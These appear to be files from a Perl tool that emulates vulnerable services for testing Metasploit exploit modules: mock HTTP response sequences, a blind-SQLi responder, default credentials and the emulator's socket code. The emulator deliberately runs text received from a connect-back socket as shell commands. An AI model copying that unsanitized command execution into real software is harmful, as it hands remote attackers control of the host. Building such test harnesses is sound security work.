 870 | 	"auxiliary/scanner/http/elasticsearch_traversal": {
 871 | 		"defaultPort": [9200],
 872 | 		"seq": [
 873 | 			["substr", "location\":\"dsr"],
 874 | 			["HTTP/1.1 200 OK\r\nContent-Length: 4\r\n\r\ntrue"],
 875 | 			["starts", "GET _snapshot/pwn/ev1l"],
 876 | 			["HTTP/1.1 400 Error\r\nContent-Length: 41\r\n\r\n{\"error\": \"32x32x115x101x99x114x101x116\"}"]
 877 | 		]
 878 | 	}, 
 879 | 	"exploit/linux/http/atutor_filemanager_traversal": {
 880 | 		"defaultPort": [80],
 881 | 		"seq": [
 882 | 			["starts", "GET /ATutor/mods/"],
 883 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\nGot it", ["action", ["connect", ":4444"]]],
 884 | 			["starts", "GET "],
 885 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\n<b>/root/jscripts/ATutor_js.php</b> "],
 886 | 			["starts", "POST /ATutor/mods/_standard/tests/question_import.php"],
 887 | 			["HTTP/1.1 302 Moved\r\nLocation: question_db.php\r\nContent-Length: 4\r\n\r\ntrue"],
 888 | 			["any"],
 889 | 			["HTTP/1.1 302 Moved\r\nLocation: bounce.php?course=0\r\nSet-Cookie: ATutorID=123a; ATutorID=123b; ATutorID=123c; ATutorID=123d;\r\nContent-Length: 4\r\n\r\ntrue"]
 890 | 		]
 891 | 	}, 
 892 | 	"exploit/linux/http/kloxo_sqli": {
 893 | 		"defaultPort": [7778],
 894 | 		"seq": [
 895 | 			["starts", "GET /display.php"],
 896 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\n<input type=hidden name=\"frm_subaction\" value =\"commandcenter\">\n<input type=hidden name=\"frm_o_o[5][class]\" value =\"adminuser\">\n<input type=hidden name=\"frm_o_o[5][nname]\" value =\"letmein\"> "],
 897 | 			["starts", "POST /display.php"],
 898 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\nGot it", ["action", ["connect", ":4444"]]],
 899 | 			["starts", "POST /htmllib/phplib/"],
 900 | 			["HTTP/1.1 302 Moved\r\nLocation: question_db.php\r\nSet-Cookie: sessionid=10001\r\nContent-Length: 4\r\n\r\ntrue"],
 901 | 			["starts", "GET /lbin/webcommand.php?login"],
 902 | 			[["function", "kloxo_sqli"]],
 903 | 			["starts", "GET /lbin/webcommand.php"],
 904 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\n__error_only_clients_and_auxiliary_allowed_to_login"]
 905 | 		]
 906 | 	}, 
 907 | 	"exploit/linux/http/riverbed_netprofiler_netexpress_exec": {
 908 | 		"defaultPort": [443],
 909 | 		"seq": [
 910 | 			["starts", "POST /index.php?page=licenses"],
 911 | 			["HTTP/1.1 200 OK\r\nSet-Cookie: SESSID=1234;\r\nContent-Length: $\r\n\r\n<html><body>uid=1234567"],
 912 | 			["any"],
 913 | 			["HTTP/1.1 200 OK\r\nSet-Cookie: SESSID=1234;\r\nContent-Length: $\r\n\r\n<html><body>nonce_value<input name=\"nonce\" value=\"letmein\"></input></body></html>"]
 914 | 		]
 915 | 	},
 916 | 	"exploit/linux/http/symantec_web_gateway_restore": {
 917 | 		"defaultPort": [443],
 918 | 		"seq": [
 919 | 			["substr", "multipart/form-data"],
 920 | 			["HTTP/1.1 200 OK\r\nSet-Cookie: PHPSESSID=1234;\r\nContent-Length: \r\n\r\n", ["action", ["connect", ":4444"]]],
 921 | 			["starts", "POST /spywall/login"],
 922 | 			["HTTP/1.1 302 Moved\r\nSet-Cookie: PHPSESSID=1234;\r\nLocation: executive_summary.php\r\nContent-Length: 0\r\n\r\n"],
 923 | 			["any"],
 924 | 			["HTTP/1.1 200 OK\r\nSet-Cookie: PHPSESSID=1234;\r\nContent-Length: $\r\n\r\nhello world"]
 925 | 		]
 926 | 	},
 927 | 	"exploit/linux/http/tp_link_sc2020n_authenticated_telnet_injection": {
 928 | 		"defaultPort": [80],
 929 | 		"comment": "",
 930 | 		"seq": [
 931 | 			["any"],
 932 | 			["HTTP/1.1 200 OK\r\nSet-Cookie: PHPSESSID=1234;\r\nContent-Length: $\r\n\r\nhello world"]
 933 | 		]
 934 | 	},
 935 | 	"exploit/linux/http/trendmicro_sps_exec": {
 936 | 		"defaultPort": [80],
 937 | 		"comment": "",
 938 | 		"seq": [
 939 | 			["any"],
 940 | 			["HTTP/1.1 200 OK\r\nSet-Cookie: PHPSESSID=1234;\r\nContent-Length: $\r\n\r\n<input type=\"hidden\" name=\"pubkey\" value=\"200\"><input type=\"hidden\" name=\"nonce\" value=\"deadbeef\""]
 941 | 		]
 942 | 	},
 943 | 	"exploit/multi/http/atutor_sqli": {
 944 | 		"defaultPort": [80],
 945 | 		"comment": "not implemented yet",
 946 | 		"seq": [
 947 | 			["starts", "GET /ATutor/mods/"],
 948 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\nGot it", ["action", ["connect", ":4444"]]],
 949 | 			["starts", "GET "],
 950 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\n<b>/root/jscripts/ATutor_js.php</b> "],
 951 | 			["starts", "POST /ATutor/mods/_standard/tests/question_import.php"],
 952 | 			["HTTP/1.1 302 Moved\r\nLocation: question_db.php\r\nContent-Length: 4\r\n\r\ntrue"],
 953 | 			["any"],
 954 | 			["HTTP/1.1 302 Moved\r\nLocation: bounce.php?course=0\r\nSet-Cookie: ATutorID=123a; ATutorID=123b; ATutorID=123c; ATutorID=123d;\r\nContent-Length: 4\r\n\r\ntrue"]
 955 | 		]
 956 | 	},
 957 | 	"exploit/multi/http/glassfish_deployer": {
 958 | 		"defaultPort": [4848],
 959 | 		"comment": "",
 960 | 		"seq": [
 961 | 			["substr", "/applications/upload.jsf?appType=webApp"],
 962 | 			["HTTP/1.1 302 Moved\r\nContent-Length: $\r\n\r\n<input type=\"checkbox\" id=\"form:title:ps:psec:enableProp:sun_checkbox123\" name=\"mgmt\" checked>"],
 963 | 			["any"],
 964 | 			["HTTP/1.1 200 OK\r\nServer: Sun GlassFish Enterprise Server v2\r\nSet-Cookie: JSESSIONID=1234;\r\nContent-Length: $\r\n\r\n<title>Deploy Enterprise Applications/Modules</title>\nos.name = Linux\nos.arch = x86"]
 965 | 		]
 966 | 	},
 967 | 	"exploit/multi/http/jira_hipchat_template": {
 968 | 		"defaultPort": [8080],
 969 | 		"comment": "TBD:   just got login part done.",
 970 | 		"seq": [
 971 | 			["starts", "GET /secure/Dashboard.jspa"],
 972 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\n"],
 973 | 			["starts", "POST /rest/gadget/1.0/login"],
 974 | 			["HTTP/1.1 200 OK\r\nSet-Cookie: JSESSIONID=1234;\r\nContent-Length: $\r\n\r\n{\"loginSucceeded\": true}"]
 975 | 		]
 976 | 	},
 977 | 	"exploit/multi/http/jira_hipchat_template": {
 978 | 		"defaultPort": [8080],
 979 | 		"comment": "TBD:   just got login part done.",
 980 | 		"seq": [
 981 | 			["starts", "GET /secure/Dashboard.jspa"],
 982 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\n"],
 983 | 			["starts", "POST /rest/gadget/1.0/login"],
 984 | 			["HTTP/1.1 200 OK\r\nSet-Cookie: JSESSIONID=1234;\r\nContent-Length: $\r\n\r\n{\"loginSucceeded\": true}"]
 985 | 		]
 986 | 	},
 987 | 	"exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli": {
 988 | 		"defaultPort": [80],
 989 | 		"comment": "TBD:   just got login part done.",
 990 | 		"seq": [
 991 | 			["starts", "GET /cgi-bin/login.cgi?name=admin&pwd=letmein"],
 992 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\n{\"sessionid\": \"12345678\"}"],
 993 | 			["starts", "POST /rest/gadget/1.0/login"],
 994 | 			["HTTP/1.1 200 OK\r\nSet-Cookie: JSESSIONID=1234;\r\nContent-Length: $\r\n\r\n{\"loginSucceeded\": true}"]
 995 | 		]
 996 | 	},
 997 | 	"exploit/multi/http/tomcat_mgr_deploy": {
 998 | 		"defaultPort": [80],
 999 | 		"comment": "got cred part done, but not the exploit part",
1000 | 		"seq": [
1001 | 			["any"],
1002 | 			["HTTP/1.1 200 OK\r\nServer: Apache Coyote\r\nContent-Length: $\r\n\r\nOS Name: Linux\nOS Architecture: x86"],
1003 | 			["starts", "POST /rest/gadget/1.0/login"],
1004 | 			["HTTP/1.1 200 OK\r\nSet-Cookie: JSESSIONID=1234;\r\nContent-Length: $\r\n\r\n{\"loginSucceeded\": true}"]
1005 | 		]
1006 | 	},
1007 | 	"exploit/multi/http/tomcat_mgr_upload": {
1008 | 		"defaultPort": [80],
1009 | 		"comment": "got cred part done, but not the exploit part",
1010 | 		"seq": [
1011 | 			["any"],
1012 | 			["HTTP/1.1 200 OK\r\nServer: Apache Coyote\r\nContent-Length: $\r\n\r\nOS Name: Linux"],
1013 | 			["starts", "POST /rest/gadget/1.0/login"],
1014 | 			["HTTP/1.1 200 OK\r\nSet-Cookie: JSESSIONID=1234;\r\nContent-Length: $\r\n\r\n{\"loginSucceeded\": true}"]
1015 | 		]
1016 | 	},
1017 | 	"exploit/unix/webapp/actualanalyzer_ant_cookie_exec": {
1018 | 		"defaultPort": [80],
1019 | 		"comment": "got cred part done, but not the exploit part",
1020 | 		"seq": [
1021 | 			["starts", "GET /lite/aa.php"],
1022 | 			["HTTP/1.1 200 OK\r\nServer: Apache Coyote\r\nContent-Length: 0\r\n\r\n"],
1023 | 			["starts", "GET /lite/view.php"],
1024 | 			["HTTP/1.1 200 OK\r\nServer: Apache Coyote\r\nContent-Length: $\r\n\r\ntitle=\"ActualAnalyzer Lite (free) 2.81\""],
1025 | 			["starts", "GET /lite/code.php"],
1026 | 			["HTTP/1.1 200 OK\r\nServer: Apache Coyote\r\nContent-Length: $\r\n\r\nalt='ActualAnalyzer' src='http://www.abc.com/'"],
1027 | 			["starts", "POST /lite/view.php"],
1028 | 			["HTTP/1.1 200 OK\r\nServer: Apache Coyote\r\nContent-Length: $\r\n\r\n<option value=\"?1234\">Page: http://www.abc.com/"],
1029 | 			["starts", "POST /lite/admin.php"],
1030 | 			["HTTP/1.1 200 OK\r\nServer: Apache Coyote\r\nContent-Length: $\r\n\r\nalt='ActualAnalyzer' src='http://www.abc.com'"],
1031 | 			["starts", "POST /rest/gadget/1.0/login"],
1032 | 			["HTTP/1.1 200 OK\r\nSet-Cookie: JSESSIONID=1234;\r\nContent-Length: $\r\n\r\n{\"loginSucceeded\": true}"]
1033 | 		]
1034 | 	},
1035 | 	"exploit/unix/webapp/vbulletin_vote_sqli_exec": {
1036 | 		"defaultPort": [80],
1037 | 		"comment": "got cred part done, but it won't show up in creds",
1038 | 		"seq": [
1039 | 			["regex", "select%20concat%28%27(.*?)%27.*select%20(username|password|salt)%20from"],
1040 | 			["HTTP/1.1 200 OK\r\nServer: Apache Coyote\r\nContent-Length: $\r\n\r\n  Database error in vBulletin ", ["eval", "$1a$2$1"]],
1041 | 			["regex", "select%20concat%28%27(.*?)%27.*select%20count"],
1042 | 			["HTTP/1.1 200 OK\r\nServer: Apache Coyote\r\nContent-Length: $\r\n\r\n Database error in vBulletin ", ["eval", "$11$1"]],
1043 | 			["regex", "cast%28%28select%20%27(.*?)information_schema"],
1044 | 			["HTTP/1.1 200 OK\r\nServer: Apache Coyote\r\nContent-Length: $\r\n\r\n Database error in vBulletin ", ["eval", "$1$1"]]
1045 | 		]
1046 | 	},
1047 | 	"exploit/windows/http/ca_arcserve_rpc_authbypass": {
1048 | 		"defaultPort": [8014],
1049 | 		"comment": "canot get SMB part done",
1050 | 		"seq": [
1051 | 			["starts", "POST /contents/service/homepage "],
1052 | 			["HTTP/1.1 200 OK\r\nServer: Apache Coyote\r\nContent-Length: $\r\n\r\n,\"user\",\"admin\",\"password\",\"letmein2\""]
1053 | 		]
1054 | 	},
1055 | 	"exploit/windows/http/octopusdeploy_deploy": {
1056 | 		"defaultPort": [80],
1057 | 		"comment": "canot get SMB part done",
1058 | 		"seq": [
1059 | 			["any"],
1060 | 			["HTTP/1.1 200 OK\r\nServer: Apache Coyote\r\nContent-Length: $\r\n\r\n,\"user\",\"admin\",\"password\",\"letmein2\""]
1061 | 		]
1062 | 	},
1063 | 	"auxiliary/admin/hp/hp_imc_som_create_account": {
1064 | 		"defaultPort": [8080],
1065 | 		"seq": [
1066 | 			["starts", "POST"],
1067 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\n", "Account msf added successfully"],
1068 | 			["any"],
1069 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\n", " unflattenKeylistIntoAnswers(['default', 'safari'], '1234'); 1111 'accountSerivce.gwtsvc', '1234', SERIALIZER_1"]
1070 | 		]
1071 | 	},
1072 | 	"auxiliary/admin/http/dlink_dsl320b_password_extractor": {
1073 | 		"defaultPort": [80],
1074 | 		"seq": [
1075 | 			["any"],
1076 | 			["HTTP/1.1 200 OK\r\nServer: micro_httpd\r\nContent-Length: $\r\n\r\n", "  SERIALIZER_1"]
1077 | 		]
1078 | 	},
1079 | 	"auxiliary/scanner/telnet/telnet_login": {
1080 | 		"defaultPort": [23],
1081 | 		"initMsg": ["Welcome to telnet server\r\nusername:"],
1082 | 		"seq": [
1083 | 			["starts", "admin"],
1084 | 			["admin\r\npassword: "],
1085 | 			["starts", "pass"],
1086 | 			["pass\r\nyou are logged in"]
1087 | 		]
1088 | 	}
1089 | }
1090 | 


--------------------------------------------------------------------------------
/userFuncs.pl:
--------------------------------------------------------------------------------
 1 | $kloxo_sqli_target = "YWJjMTIz";
 2 | sub kloxo_sqli {
 3 | 	#print "$dataBuf\n";
 4 | 	if ($dataBuf !~ /from%20client%20limit%201%29%2c(\d+)%2c1%29%29%3d(\d+)%/) {
 5 | 		print "no match\n";
 6 | 		return "";
 7 | 	}
 8 | 	my $pos  = $1;
 9 | 	my $c    = pack("C", $2);
10 | 	#printf "$pos|$c\n";
11 | 	my $r = 0;
12 | 	if ($pos == 1) {
13 | 		$r = ($c eq "_")? 1 : 0;
14 | 	} elsif ($pos < 8) {
15 | 		$r = 1;
16 | 	} elsif ($pos == 16) { #16 = 7 + length(kloxo_sqli_target);
17 | 		$r = 1;
18 | 	} elsif (substr($kloxo_sqli_target, $pos-8, 1) eq $c) {
19 | 		$r = 1;
20 | 	}
21 | 	if ($r) {
22 | 		return "HTTP/1.1 200\r\nContent-Length: 0\r\n\r\n";
23 | 	} else {
24 | 		return "HTTP/1.1 200\r\nContent-Length: 18\r\n\r\n_error_login_error";
25 | 	}
26 | }
27 | 
28 | 1;
29 | 


--------------------------------------------------------------------------------
/userpass.lst:
--------------------------------------------------------------------------------
1 | root password
2 | admin admin
3 | jdole abc123
4 | 


--------------------------------------------------------------------------------
/vulEmu.pl:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env perl
  2 | 
  3 | use JSON;
  4 | use Data::Dumper;
  5 | use IO::Socket;
  6 | use IO::Select;
  7 | use IO::Socket::INET;
  8 | use IO::Socket::SSL;
  9 | use Try::Tiny;
 10 | use IO::Compress::Gzip qw(gzip);
 11 | use Compress::Zlib qw(crc32);
 12 | use Storable qw(dclone);
 13 | use FindBin qw($Bin);
 14 | no warnings 'deprecated';
 15 | my $isWin = 0;
 16 | if ($^O =~ /mswin/i) { $isWin = 1;}
 17 | 
 18 | require "$Bin/userFuncs.pl";
 19 | my $CONNECT = 1;
 20 | my $DATA    = 2;
 21 | my $serviceType = {};
 22 | my $cfg;
 23 | my $srvSocks = {};
 24 | my $sock2module = {};
 25 | my $isSrvSock = {};
 26 | my $isSSLSock = {};
 27 | my $port2module = {};
 28 | my $ctx       = {};
 29 | my $refs      = {};
 30 | my $e;
 31 | my $saved;
 32 | my $sock;
 33 | my $keyFields = {desc => 1, comment => 1 };
 34 | my $sendFile = "";
 35 | my $lastSock = "";
 36 | my $ftpDataSock = "";
 37 | my $pendingAction = []; 
 38 | my $meteSock;
 39 | my $meteState = 0;
 40 | my $isServerTypeSet = 0;
 41 | my $recvedMetepreterData = 0;
 42 | my $defaultPorts = {};
 43 | my $peerHost;
 44 | my $debug2 = 0;
 45 | my $savedActCmd; #reactivate module after reloading service file
 46 | my @pendingActions;
 47 | my @results = (); #matched pieces from regex match, 
 48 | my $dataBuf = "";
 49 | my $allServices = {}; 
 50 | 
 51 | my $s = IO::Select->new();
 52 | my $s2 = IO::Select->new(); #test if a socket is SSL
 53 | use threads ('yield',
 54 | 			 'stack_size' => 64*4096,
 55 | 			 'exit' => 'threads_only',
 56 | 			 'stringify');
 57 | use threads::shared;
 58 | my $threadVar :shared;
 59 | my $thr;
 60 | if ($isWin) {
 61 | 	$thr = threads->create('input_thread');
 62 | } else {
 63 | 	$s->add(\*STDIN);
 64 | }
 65 | readCfg();
 66 | my @a;
 67 | my $showData = 0;
 68 | my $lhost = "127.0.0.1";
 69 | $extraCmd = "";
 70 | for (my $i=0; $i<=$#ARGV; $i++) {
 71 | 	if ($ARGV[$i] eq "help" || $ARGV[$i] eq "-h") {
 72 | 		print "$0 [ip 192.168.0.10] [show] [set activate:exploits/windows/iis/ms01_023_printer]\n";
 73 | 		exit;
 74 | 	} elsif ($ARGV[$i] eq "set") {
 75 | 		@a = split(/:/, $ARGV[$i+1], 2);
 76 | 		$extraCmd = "$a[0] $a[1]";
 77 | 		print "Auto launch: $extraCmd\n";
 78 | 		$i ++;
 79 | 	} elsif ($ARGV[$i] eq "show") {
 80 | 		print "Data received will be display\n";
 81 | 		$showData = 1;
 82 | 	} elsif ($ARGV[$i] eq "ip") {
 83 | 		$lhost = $ARGV[$i+1]; $i++;
 84 | 		print "lhost is now $lhost\n";
 85 | 	}
 86 | }
 87 | if ($extraCmd ne "") { processCmd($extraCmd);}
 88 | #print Dumper($cfg);
 89 | my $ctrlSrvSock = IO::Socket::INET->new( Proto    => 'tcp',
 90 |                                  LocalPort => 1,
 91 | 								Reuse     => 1,
 92 |                                 Listen    => 500
 93 |    ) || die "failed to setup ctrl $@\n";
 94 | $s->add($ctrlSrvSock);
 95 | my $ctrlSock;
 96 | my $client;
 97 | my $len;
 98 | my $isTlv;
 99 | my $buff;
100 | my %allServices;
101 | my $lastTs = 0.0;
102 | $| = 1;
103 | print ">>";
104 | while (1) {
105 | 	@readySocks = mySelect(0.5);
106 | 	checkDelayedJob();
107 | 	if ($isWin) {
108 | 		if ($threadVar ne "") {
109 | 			processCmd($threadVar);
110 | 			$threadVar = "";
111 | 		}
112 | 	}
113 | 	foreach $sock (@readySocks) {
114 | 		if ($isWin == 0) {
115 | 			if ($sock eq \*STDIN) {
116 | 				chomp($cmd = <STDIN>);
117 | 				processCmd($cmd);
118 | 				print ">>";
119 | 				next;
120 | 			}
121 | 		}
122 | 		#printf "sock=$sock|$meteSock| %d\n", $sock->sockport();
123 | 		if ($ctrlSrvSock eq $sock) {
124 | 			$ctrlSock = $sock->accept();
125 | 			$s->add($ctrlSock);
126 | 		} elsif ($ctrlSock eq $sock) {
127 | 			$buff = "";
128 | 			recv($sock, $buff, 0x10000,0);
129 | 			$len = length($buff);
130 | 			#print "len=$len\n";
131 | 			if (length($buff) <= 0) {
132 | 				$s->remove($sock);
133 | 				close $sock;
134 | 				next;
135 | 			}
136 | 			if ($buff eq "\n") { next;}
137 | 			print "$buff\n";
138 | 			processCmd($buff, 1);
139 | 		} elsif (defined $isSrvSock->{$sock}) {
140 | 			$client = $sock->accept();
141 | 			$peerHost = $client->peerhost();
142 | 			$refs->{$client}      = $client;
143 | 			check4SSL($client); #upgrade to SSL whenever client likes to.
144 | 			$s->add($client);
145 | 			#if ($isSSLSock->{$sock}) {
146 | 			#	$isSSLSock->{$client} = 1;
147 | 			#}
148 | 			if ($sock->sockport() == 20) { #assume it's ftp data channel
149 | 				$ftpDataSock = $client;
150 | 				next;
151 | 			}
152 | 			$sock2module->{$client} = $port2module->{$sock->sockport()};
153 | 			sequence($client, $CONNECT);
154 | 		} elsif ($meteSock eq $sock) { #can be used for metepreter
155 | 			$buff = "";
156 | 			sysread($sock, $buff, 0x100000);
157 | 			$len = length($buff);
158 | 			#print "len=$len\n";
159 | 			if ($len <= 0) {
160 | 				$s->remove($meteSock);
161 | 				close $sock;
162 | 				$recvedMetepreterData = 0;
163 | 				next;
164 | 			}
165 | 			$recvedMetepreterData = 1;
166 | 			handleMeteSock();
167 | 		} elsif ($sock->sockport() == 20) {
168 | 			
169 | 			$buff = readSock($sock);
170 | 			if (length($buff) <= 0) {
171 | 				$s->remove($sock);
172 | 				close $sock;
173 | 			}
174 | 		} else {
175 | 			$dataBuf = readSock($sock);
176 | 			if (length($dataBuf) <= 0) {
177 | 				$s->remove($sock);
178 | 				delete $refs->{$sock};
179 | 				delete $ctx->{$sock};
180 | 				delete $isSSLSock->{$sock};
181 | 				close $sock;
182 | 				next;
183 | 			}
184 | 			sequence($sock, $DATA, $dataBuf);
185 | 			if ($#pendingActions >= 0) {
186 | 				#printf "count of pending actions %d\n", $#pendingActions;
187 | 				$action = shift @pendingActions;
188 | 				execute($action);
189 | 			}
190 | 		}
191 | 	}
192 | }
193 | sub readSock {
194 | 	my $sock = shift;
195 | 	my $buff = "";
196 | 	if (defined $isSSLSock->{$sock}) {
197 | 		sysread($sock, $buff, 0x1000000);
198 | 		if ($showData) { printf("recved: $buff\n");}
199 | 	} else {
200 | 		sysread($sock, $buff, 0x100000);
201 | 	}
202 | 	return $buff;
203 | }
204 | sub checkDelayedJob {
205 | 	if ($lastTs != 0.0) {
206 | 		my $tmp = getTS();
207 | 		#printf("time elapsed %f\n", $tmp-$lastTs);
208 | 		if ( ($tmp - $lastTs) >= 1.0) {
209 | 			if ($recvedMetepreterData == 0) {
210 | 				print "sending >> to start with simple session\n";
211 | 				$meteSock->send(">>");
212 | 				$meteState = 1; 
213 | 			}
214 | 			$lastTs = 0.0;
215 | 		}
216 | 	}
217 | }
218 | sub processCmd {
219 | 	my ($cmd, $option) = @_;
220 | 	$cmd =~ s/^\s*//;
221 | 	my @a = split(/\s+/, $cmd);
222 | 	my @b;
223 | 	my $module;
224 | 	if ($a[0] =~ /^act/) { #activate
225 | 		$savedActCmd = $cmd;
226 | 		$pattern = $a[1];
227 | 		if (defined $option) { goto only1choice;}
228 | 		foreach $e (keys %$allServices) {
229 | 			if ($e =~ /$pattern/) {
230 | 				push @b, $e;
231 | 			}
232 | 		}
233 | 		if ($#b < 0) { 
234 | 			print "did not find a match\n";
235 | 			return;
236 | 		} elsif ($#b > 0) {
237 | 			print "multiple entries found, please make a choice by number:\n";
238 | 			$tmp = 1;
239 | 			foreach $e (@b) {
240 | 				printf "%2d $e\n", $tmp ++;
241 | 			}
242 | 			chomp($tmp = <STDIN>);
243 | 			$module = $allServices->{$b[$tmp-1]};
244 | 		} else {
245 | only1choice:
246 | 			$module = $allServices->{$pattern};
247 | 		}
248 | 		my $ports2open = {};
249 | 		if (defined $a[2]) {
250 | 			for (my $i=2; $<=$#a; $i++) {
251 | 				$port2module->{$a[$i]} = $module;
252 | 				$ports2open->{$a[$i]} = 1;
253 | 				#setupSocket($port);
254 | 			}
255 | 		} else {
256 | 			foreach my $port (@{$module->{defaultPort}}) {
257 | 				$port2module->{$port} = $module;
258 | 				$ports2open->{$port} = 1;
259 | 			}
260 | 		}
261 | 		setupSocket($ports2open);
262 | 	} elsif (($a[0] eq "ls") || ($a[0] eq "list")) {
263 | 		foreach $e (keys %{$cfg->{$port}}) {
264 | 			if (defined $keyFields->{$e}) { next;}
265 | 			print "	$e\n";
266 | 		}
267 | 	} elsif ($a[0] eq "show") {
268 | 		$port = $a[1];
269 | 		print "$port is serviced by $port2module->{$port}->{name}\n";
270 | 	} elsif ($a[0] eq "reload") {
271 | 		readCfg();
272 | 		print "reloaded cfg\n";
273 | 	} elsif ($a[0] eq "exit") {
274 | 		print "Quitting...\n\n";
275 | 		exit;
276 | 	}
277 | 	print ">>";
278 | }
279 | 
280 | sub handleMeteSock {
281 | 	#my $sock = shift;
282 | 	$isTlv = 0;
283 | 	if ($meteState == 1) { #simple
284 | 		chomp($buff);
285 | 		$tmp = `$buff`;
286 | 		$meteSock->send($tmp . ">>");
287 | 		return;
288 | 	}
289 | 	$accumBuf .= $buff;
290 | 	my $len = length($accumBuf);
291 | accumBufTryAgain:	
292 | 	if ($len < 4) {
293 | 		return;
294 | 	} 
295 | 	#TODO need to look at the bytes in details
296 | 	$accumBuf = substr($accumBuf, $len+4);
297 | 	$len = length($accumBuf);
298 | 	if ($len == 0) { return; }
299 | 	goto accumBufTryAgain;
300 | }
301 | sub extraProc {
302 | 	my ($data, $extraParam) = @_;
303 | 	if (! defined $extraParam) { return;}
304 | 	if ($extraParam eq "saveHttpBody") {
305 | 		if ($data =~ /\r\n\r\n/) {
306 | 			print "saving...\n";
307 | 			$saved = $';
308 | 		} else {
309 | 			$saved = "";
310 | 		}
311 | 	}
312 | }
313 | sub sequence {
314 | 	my ($sock, $type, $data) = @_;
315 | 	my $seq = $sock2module->{$sock}->{seq};
316 | 	my $pattern;
317 | 	my $i;
318 | 	if (! defined $ctx->{$sock}) { $ctx->{$sock} = 0;}
319 | 	my $initMsg = $sock2module->{$sock}->{initMsg};
320 | 	if ($type == $CONNECT) {
321 | 		if (defined $initMsg) {
322 | 			sendit($sock, compact($initMsg));
323 | 		}
324 | 	} else {
325 | 		$len = scalar @$seq;
326 | 		#printHex($data, 32);
327 | 		for ($i=0; $i<$len; $i+=2) {
328 | 			$pattern = compact([$seq->[$i]->[1]]);
329 | 			#print "debug $seq->[$i]->[0] $pattern\n";
330 | 			#printHex($pattern,32);
331 | 			if ($seq->[$i]->[0] eq "regex") {
332 | 				#$pattern = $seq->[$i]->[1];
333 | 				if ($data =~ /$pattern/) {
334 | 					#print "match again regex $pattern|$1|\n";
335 | 					$results[1] = $1;
336 | 					$results[2] = $2;
337 | 					$results[3] = $3;
338 | 					extraProc($data, $seq->[$i]->[2]);
339 | 					return sendit($sock, compact($seq->[$i+1]));
340 | 				}
341 | 			} elsif ($seq->[$i]->[0] eq "substr") {
342 | 				if (index($data, $pattern) >= 0) {
343 | 					extraProc($data, $seq->[$i]->[2]);
344 | 					return sendit($sock, compact($seq->[$i+1]));
345 | 				}
346 | 			} elsif ($seq->[$i]->[0] eq "starts") {
347 | 				#print "got here $pattern\n";
348 | 				if (index($data, $pattern) == 0) {
349 | 					extraProc($data, $seq->[$i]->[2]);
350 | 					return sendit($sock, compact($seq->[$i+1]));
351 | 				}
352 | 			} elsif ($seq->[$i]->[0] eq "equal") {
353 | 				if ($data eq $pattern) {
354 | 					extraProc($data, $seq->[$i]->[2]);
355 | 					return sendit($sock, compact($seq->[$i+1]));
356 | 				}
357 | 			} elsif ($seq->[$i]->[0] eq "split") {
358 | 				@results = split($seq->[$i]->[1], $data);
359 | 				#print Dumper(\@results);
360 | 				extraProc($data, $seq->[$i]->[2]);
361 | 				return sendit($sock, compact($seq->[$i+1]));
362 | 			} elsif ($seq->[$i]->[0] eq "any") {
363 | 				extraProc($data, $seq->[$i]->[2]);
364 | 				return sendit($sock, compact($seq->[$i+1]));
365 | 			}
366 | 		}
367 | 		printf "can't find a match for request $data of size %d\n", length($data);
368 | 	}
369 | 	$ctx->{$sock} ++;
370 | }
371 | 
372 | sub printHex {
373 | 	my ($x, $size) = @_;
374 | 	my @a = unpack("C*", $x);
375 | 	my $i;
376 | 	if (($size == 0) || ($size > $#a)) {
377 | 		$size = $#a;
378 | 	}
379 | 	for ($i=0; $i<=$size; $i++) {
380 | 		printf "%02x ", $a[$i];
381 | 		if (($i %16) == 15) { print "\n";}
382 | 	}
383 | 	if (($i % 16) != 15) {print "\n";}
384 | }
385 | 
386 | sub compact {
387 | 	my ($a, $skips) = @_;
388 | 	my $ret;
389 | 	my $e;
390 | 	my $value;
391 | 	my $offset;
392 | 	my $pending = -1;
393 | 	my $j;
394 | 	if (! defined $skips) { $skip = 0; }
395 | 	foreach $e (@$a) {
396 | 		if ($skips > 0) {$skips --; next;}
397 | 		#print "e=$e|$e->[0]|\n";
398 | 		if ((ref $e) eq "ARRAY") {
399 | 			#if ($e->[1] =~ /^\$(\d)$/) { $e->[1] = $results[$1 - 1];}
400 | 			if ((ref $e->[0]) eq "ARRAY") {
401 | 				$value = compact($e->[0]);
402 | 			} elsif ($e->[0] eq "repeat") {
403 | 				$cnt = $e->[2];
404 | 				$value = $e->[1] x $cnt;
405 | 			} elsif ($e->[0] eq "nsize") {
406 | 				$offset = length($ret);
407 | 				$pending = $e->[1];
408 | 				next;
409 | 			} elsif ($e->[0] eq "crc32") {
410 | 				#print "calling crc on |$e->[1]|$results[0]|\n";
411 | 				$value = sprintf("%x", crc32(substr($e->[1], 0, $results[0])));
412 | 			} elsif ($e->[0] eq "action") {
413 | 				#print "got an action\n";
414 | 				for ($j=1; defined $e->[$j]; $j++) {
415 | 					push @pendingActions, $e->[$j];
416 | 				}
417 | 				next;
418 | 			} elsif ($e->[0] eq "eval") {
419 | 				#print Dumper($e);
420 | 				$tmp = $e->[1];
421 | 				my $newExp;
422 | 				while ($tmp =~ /\$(\d)/) {
423 | 					$newExp .= $` . "\$results[$1]";
424 | 					$tmp = $';
425 | 				}
426 | 				$newExp .= $tmp; 
427 | 				print "$newExp\n";
428 | 				eval ("\$value = \"" . $newExp . "\"");
429 | 			} elsif ($e->[0] eq "file") {
430 | 				$value = readFile($e->[1]);
431 | 			} elsif ($e->[0] eq "append") {
432 | 				$value = compact($e, 1);
433 | 			} elsif ($e->[0] eq "saved") {
434 | 				$value = $saved
435 | 			} elsif ($e->[0] eq "function") {
436 | 				$value = &{$e->[1]}();
437 | 			}  elsif ($e->[0] eq "gzip") {
438 | 				$value = "";
